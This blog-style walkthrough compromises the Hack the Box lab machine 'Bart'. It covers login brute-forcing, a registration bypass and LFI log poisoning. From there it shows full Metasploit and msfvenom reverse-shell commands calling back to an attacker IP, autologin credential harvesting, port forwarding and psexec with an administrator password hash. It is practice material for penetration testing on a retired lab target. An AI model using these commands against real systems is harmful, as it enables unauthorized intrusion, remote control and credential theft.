CTF Challenges

Hack the Box: Bart Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Bart” which is available online for those who want to increase their skill in penetration testing and black box testing. Bart is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.81 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.81

From the given below image, you can observe we find only port 80 is open on the target system.

As port 80 is running http, we open the IP address in our browser. As soon as we open the IP address we get redirected to “forum.bart.htb”.

Since htb doesn’t have global DNS, we aren’t going to be able to resolve the site. So we add a DNS entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb.

When we open forum.bart.htb, we find a website that has been built on WordPress.

When we open bart.htb it redirects us to forum.bart.htb. We enumerate directories for both domains and find a directory called “/monitor” for domain bart.htb.

dirb http://bart.htb/

When we open /monitor directory given by dirb scan and find a login page

We use burpsuite to brute force the login page using an /usr/share/wordlists/metasploit/common-root.txt dictionary and find the credentials to be harvery:potter.

We login using these credentials and get redirected to a different domain called monitor.bart.htb.

We add the domain name monitor.bart.htb in /etc/hosts file.

Now when we refresh the page we get a page for server monitoring.

Going through the page we find a link to a site and a domain we need to add to /etc/hosts.

We add domain internal-01.bart.htb we found earlier on the site to /etc/hosts.

We now open internal-01.bart.htb and find a login form.

We capture the login request using burpsuite and modify the request by changing login.php to register.php.

Then we login using the credentials we use to register and find a chat box.

We find a link to an open log link, we capture the request using burpsuite and when we look at the header it looks like filename parameter may be vulnerable to LFI.

We were not able to access any system file but we were able to access log.php and find access logs.

Now we use log poisoning to get a reverse shell. We change the user-agent to run the whoami command, when we run the command we get the user name.

We were not able to get reverse shell using web delivery, so we first create a reverse shell using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f exe > shell.exe

After creating our shell, we upload the payload to the target machine using PowerShell. First we set up our HTTP server using python.

python -m SimpleHTTPServer 80

We set up our listener using Metasploit before executing the target machine.

msf > use exploit/multi/handler
msf > exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf > exploit(multi/handler) > set lhost 10.10.14.6
msf > exploit(multi/handler) > set lport 4444
msf > exploit(multi/handler) > run

 

After uploading our shell and setting up our listener, we now execute the payload using log poisoning.

As soon as we execute the payload we get our reverse shell.

After we get the reverse shell we find that the system is 64-bit architecture so we change the payload type to 64-bit architecture.

msf > use windows/local/payload_inject
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 10.10.14.6
msf exploit(windows/local/payload_inject) > set lport 1234
msf exploit(windows/local/payload_inject) > set session 1
msf exploit(windows/local/payload_inject) > run

After running the exploit, we get a 64-bit meterpreter shell. Now we can run post modules properly as 32-bit meterpreter was running into problems.

We use autologin post module to find the password for Administrator user.

msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set session 2
msf post(windows/gather/credentials/windows_autologin) > run

Now enumerating the target machine, we find that port 445 is running internally. So we use port forwarding so that we can use our machine to connect with it.

meterpreter > portfwd add -l 443 -p 445 -r 10.10.10.81

Now we use impacket-smbserver to create an smb server in our machine. So that we can share our /root directory with the target machine as our shell that we created earlier can be run on the target machine.

impacket-smbserver hack /root

Now the session we had earlier died so port 4444 is free. So we are going to use that payload to get our reverse shell. First, we run Metasploit in a new tab and set up our listener.

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run

Now we use psexec auxiliary to run our payload hosted on our system.

msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.14.6\\\hack\\\shell.exe
msf auxiliary(admin/smb/psexec_command) > set rhosts 127.0.0.1
msf auxiliary(admin/smb/psexec_command) > set rport 443
msf auxiliary(admin/smb/psexec_command) > run

 

As soon as we run psexec auxiliary we get a reverse shell with as an administrator.

In c:\Users\Administrator\Desktop we find a file called root.txt when we open it and find our first flag.

Enumerating the system in c:\Users\h.potter, we find a file called user.txt. When we take a look at the content of the file we get our second flag.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here